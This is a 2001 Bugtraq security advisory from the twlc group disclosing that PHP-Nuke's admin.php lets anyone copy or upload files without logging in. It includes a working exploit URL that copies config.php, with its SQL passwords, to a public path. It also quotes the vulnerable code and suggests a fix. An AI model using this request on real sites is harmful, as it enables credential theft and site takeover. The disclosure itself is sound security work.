twlc advisory: all versions of php nuke are vulnerable...

From:	 supergate@twlc.net
To:	 "bugtraq" <bugtraq@securityfocus.com>
Subject: twlc advisory: all versions of php nuke are vulnerable...
Date:	 Mon, 24 Sep 2001 21:31:16 +0200

twlc security divison
24/09/2001

Php nuke BUGGED.

Found by:
LucisFero and supergate
./twlc

Summary
This time the bug is really dangerous...it allows you to 'cp' any file on
the box... or even upload files...

Systems Affected
all the versions ARE vulnerable
except '5.0 RC1' (i wonder why a released c. is ok while the final 5.2 is
bugged)

Explanation
Do you need sql password?

http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.tx
t&wdir=/images/&userfile=config.php&userfile_name=hacked.txt

the admin 'login' page will be prompted just go to
http://www.server.net/images/hacked.txt and you will see config.php that as
everyone knows contain the sql's passwords, you can even upload files...i
leave you the 'fun' to find all the ways to use it... and try to dont be a
SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
LET YOU HAVE FUN.

let me explain you the bug... admin.php contains this routine:

$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite -------------------------------------> OMG! WE
AGREEEEEEEE lmao
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
}

that doesnt do a check to see if you are logged as admin or no... so you can
use it anyway...

Solution
we erased the function... cause we wanted to remove the file manager anyway
but i suggest you to do the same... -to upload files use FTP-

conclusions:
yet another bug of php nuke... this software is used by thousands of
people... (we run something based on it too) i hope that this time the
author will reply soon and will release a patch too! as i said before just
dont try to be a script kiddie or we  simply WONT post anymore this kind of
advisories. Prolly the funny thing is that who first discovered the bug was
LucisFero that... 2 hours before didnt knew php ... so i (supergate) fear
him and you should too.

posted at:
http://www.twlc.net article http://www.twlc.net/article.php?sid=421
bugtraq@securityfocus.com
http://www.phpnuke.org -good luck-
http://sourceforge.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal
System
and of course mailed to the author of php nuke

contacts (bugs, ideas, insults, cool girls... remember that trojans are
directed to /dev/null):

lucisfero@twlc.net
supergate@twlc.net

http://www.twlc.net (yes we are patched)

peace out pimps. bella a tutti.

eof